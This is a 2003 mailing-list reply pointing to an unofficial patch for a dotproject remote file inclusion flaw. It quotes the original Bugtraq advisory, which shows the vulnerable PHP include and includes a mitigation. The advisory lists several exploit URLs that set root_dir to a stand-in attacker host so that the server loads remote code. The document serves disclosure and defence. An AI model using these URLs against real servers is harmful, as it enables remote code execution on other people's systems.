Re: dotproject Remote Code Execution Vulnerability : Patch

["Frog Man" <leseulfrog@hotmail.com>]

A non-official patch has been created for this hole and is published on
http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english 
version) .





> From: mindwarper@hush.com
> To: bugtraq@securityfocus.com
> Subject: dotproject Remote Code Execution Vulnerability
> Date: Wed, 29 Jan 2003 04:02:24 -0800
>
> dotproject Remote Code Execution Vulnerability (By Mindwarper)
>
> <------- ------->
>
> ----------------------
> Vendor Information:
> ----------------------
>
> Homepage : http://www.dotproject.net
> Vendor : informed
> Mailed advisory: 28/01/03
> Vender Response : None
>
>
> ----------------------
> Affected Versions:
> ----------------------
>
> dev20030121
>
>
> ----------------------
> Vulnerability:
> ----------------------
>
>
> dotproject is a PHP+MySQL beta level web based project management and 
> tracking tool
> that dotmarketing started in Dec. 2000.
> Inside the directory /modules/ multiple files try to include 
> classdefs/date.php
> without defining $root_dir first and allow remote attackers to inject their 
> own
> servers if globals are set on.
>
> Example Code from modules/projects/addedit.php:
>
> ******
>
> <?php
> ##
> ## Files modules: index page re-usable sub-table
> ##
>
> require_once( "$root_dir/classdefs/date.php" );
> $df = $AppUI->getPref('SHDATEFORMAT');
> $tf = $AppUI->getPref('TIMEFORMAT');
>
> ******
>
> As you can see nothing happens before the require_once function is called 
> and therefore
> with globals set on an attacker may include remote files.
>
> Example:
>
> http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker
>
> this works also on
>
> http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker
> http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker
> http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker
> http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker
> http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker
>
>
> ----------------------
> Solution:
> ----------------------
>
> Please check the vendor's website for new patches.
>
> As a temporary solution, create a .htaccess file that contains 'Deny from 
> all'.
> Place it in the /modules/ directory and that should block remote users from 
> accessing it.
>
>
> ----------------------
> Contact:
> ----------------------
>
> Name: Mindwarper
> Email: mindwarper@hush.com
> Website: http://mindlock.bestweb.net
>
>
> <------- ------->
>
>
>
>
> Concerned about your privacy? Follow this link to get
> FREE encrypted email: https://www.hushmail.com/?l=2
>
> Big $$$ to be made with the HushMail Affiliate Program:
> https://www.hushmail.com/about.php?subloc=affiliate&l=427

_________________________________________________________________